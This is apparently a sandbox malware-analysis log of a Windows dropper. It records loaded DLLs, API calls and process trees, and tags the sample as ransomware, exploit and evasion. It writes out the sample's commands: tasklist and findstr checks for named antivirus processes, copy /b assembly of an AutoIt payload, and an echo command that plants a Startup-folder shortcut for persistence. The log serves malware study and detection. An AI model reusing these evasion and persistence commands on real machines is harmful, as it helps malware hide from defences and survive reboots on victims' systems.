Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F542D5: CreateFileW,DeviceIoControl,CloseHandle,11_2_00F542D5
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F48F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,11_2_00F48F2E
Source: C:\Users\user\Desktop\ldqj18tn.exeCode function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_00403883
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F55778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,11_2_00F55778
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00DD5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,17_2_00DD5778
Source: C:\Users\user\Desktop\ldqj18tn.exeFile created: C:\Windows\TripsAstronomyJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeFile created: C:\Windows\ParadeMorrisonJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeFile created: C:\Windows\BibliographicHcJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exe Code function: 0_2_0040497C
Source: C:\Users\user\Desktop\ldqj18tn.exe Code function: 0_2_00406ED2
Source: C:\Users\user\Desktop\ldqj18tn.exe Code function: 0_2_004074BB
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Code function: 11_2_00EFB020
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Code function: 11_2_00EF94E0
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Code function: 11_2_00EF9C80
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Code function: 11_2_00F123F5
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Code function: 11_2_00F78400
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Code function: 11_2_00F26502
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Code function: 11_2_00EFE6F0
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Code function: 11_2_00F2265E
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Code function: 11_2_00F1282A
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Code function: 11_2_00F289BF
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Code function: 11_2_00F26A74
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Code function: 11_2_00F70A3A
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Code function: 11_2_00F00BE0
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Code function: 11_2_00F4EDB2
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Code function: 11_2_00F1CD51
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Code function: 11_2_00F70EB7
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Code function: 11_2_00F58E44
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Code function: 11_2_00F26FE6
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Code function: 11_2_00F133B7
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Code function: 11_2_00F0D45D
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Code function: 11_2_00F1F409
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Code function: 11_2_00F116B4
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Code function: 11_2_00EFF6A0
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Code function: 11_2_00EF1663
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Code function: 11_2_00F0F628
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Code function: 11_2_00F178C3
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Code function: 11_2_00F1DBA5
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Code function: 11_2_00F11BA8
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Code function: 11_2_00F29CE5
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Code function: 11_2_00F0DD28
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Code function: 11_2_00F1BFD6
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Code function: 11_2_00F11FC0
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Code function: 17_2_00D7B020
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Code function: 17_2_00D794E0
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Code function: 17_2_00D79C80
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Code function: 17_2_00D923F5
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Code function: 17_2_00DF8400
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Code function: 17_2_00DA6502
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Code function: 17_2_00D7E6F0
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Code function: 17_2_00DA265E
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Code function: 17_2_00D9282A
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Code function: 17_2_00DA89BF
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Code function: 17_2_00DA6A74
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Code function: 17_2_00DF0A3A
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Code function: 17_2_00D80BE0
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Code function: 17_2_00DCEDB2
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Code function: 17_2_00D9CD51
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Code function: 17_2_00DF0EB7
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Code function: 17_2_00DD8E44
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Code function: 17_2_00DA6FE6
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Code function: 17_2_00D933B7
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Code function: 17_2_00D8D45D
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Code function: 17_2_00D9F409
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Code function: 17_2_00D916B4
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Code function: 17_2_00D7F6A0
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Code function: 17_2_00D71663
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Code function: 17_2_00D8F628
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Code function: 17_2_00D978C3
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Code function: 17_2_00D91BA8
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Code function: 17_2_00D9DBA5
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Code function: 17_2_00DA9CE5
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Code function: 17_2_00D8DD28
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Code function: 17_2_00D9BFD6
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Code function: 17_2_00D91FC0
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Code function: String function: 00F01A36 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Code function: String function: 00F18B30 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Code function: String function: 00F10D17 appears 70 times
Source: C:\Users\user\Desktop\ldqj18tn.exe Code function: String function: 004062A3 appears 58 times
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Code function: String function: 00D98B30 appears 42 times
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Code function: String function: 00D90D17 appears 70 times
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Code function: String function: 00D81A36 appears 34 times
Source: ldqj18tn.exe, 00000000.00000003.2211110339.00000000005A6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs ldqj18tn.exe
Source: ldqj18tn.exe, 00000000.00000003.2138986925.00000000029E0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAutoIt3.exeB vs ldqj18tn.exe
Source: ldqj18tn.exe, 00000000.00000002.2211647425.00000000005A6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs ldqj18tn.exe
Source: ldqj18tn.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine Classification label: mal84.rans.expl.evad.winEXE@28/26@2/0
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Code function: 11_2_00F5A6AD GetLastError,FormatMessageW
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Code function: 11_2_00F48DE9 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Code function: 11_2_00F49399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Code function: 17_2_00DC8DE9 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Code function: 17_2_00DC9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\ldqj18tn.exe Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Code function: 11_2_00F54148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\ldqj18tn.exe Code function: 0_2_004024FB CoCreateInstance
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Code function: 11_2_00F5443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif File created: C:\Users\user\AppData\Local\TechMesh Dynamics
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1336:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5140:120:WilError_03
Source: C:\Users\user\Desktop\ldqj18tn.exe File created: C:\Users\user\AppData\Local\Temp\nskBDCA.tmp
Source: C:\Users\user\Desktop\ldqj18tn.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.bat
Source: ldqj18tn.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\ldqj18tn.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\ldqj18tn.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: ldqj18tn.exe ReversingLabs: Detection: 65%
Source: C:\Users\user\Desktop\ldqj18tn.exe File read: C:\Users\user\Desktop\ldqj18tn.exe
Source: unknown Process created: C:\Users\user\Desktop\ldqj18tn.exe "C:\Users\user\Desktop\ldqj18tn.exe"
Source: C:\Users\user\Desktop\ldqj18tn.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.bat
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 704579
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "MARTNMSPIDERRINGTONE" Mh
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Consequence + ..\Gently + ..\Situations + ..\International + ..\Jet + ..\Commodities + ..\Mood + ..\Fastest + ..\Estimate + ..\Jessica + ..\Prof + ..\Becoming + ..\Princess + ..\Required + ..\Traveller + ..\Against u
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Organizational.pif u
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url" & echo URL="C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr" "C:\Users\user\AppData\Local\TechMesh Dynamics\M"
Source: C:\Users\user\Desktop\ldqj18tn.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\ldqj18tn.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\ldqj18tn.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\ldqj18tn.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\ldqj18tn.exe Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\ldqj18tn.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\ldqj18tn.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\ldqj18tn.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\ldqj18tn.exe Section loaded: riched20.dll
Source: C:\Users\user\Desktop\ldqj18tn.exe Section loaded: usp10.dll
Source: C:\Users\user\Desktop\ldqj18tn.exe Section loaded: msls31.dll
Source: C:\Users\user\Desktop\ldqj18tn.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\ldqj18tn.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\ldqj18tn.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\ldqj18tn.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\ldqj18tn.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\ldqj18tn.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\ldqj18tn.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\ldqj18tn.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\ldqj18tn.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\ldqj18tn.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\ldqj18tn.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\ldqj18tn.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\ldqj18tn.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\ldqj18tn.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\ldqj18tn.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\ldqj18tn.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\ldqj18tn.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\ldqj18tn.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\ldqj18tn.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\ldqj18tn.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\ldqj18tn.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\ldqj18tn.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\choice.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Section loaded: version.dll
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\ldqj18tn.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: Window Recorder Window detected: More than 3 window changes detected
Source: ldqj18tn.exe Static file information: File size 1656911 > 1048576
Source: ldqj18tn.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\ldqj18tn.exe Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Code function: 11_2_00F18B75 push ecx; ret 11_2_00F18B88
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Code function: 17_2_00D8CBDB push eax; retf 17_2_00D8CBF8
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Code function: 17_2_00D98B75 push ecx; ret 17_2_00D98B88

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif File created: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Code function: 11_2_00F759B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Code function: 11_2_00F05EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Code function: 17_2_00DF59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr Code function: 17_2_00D85EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
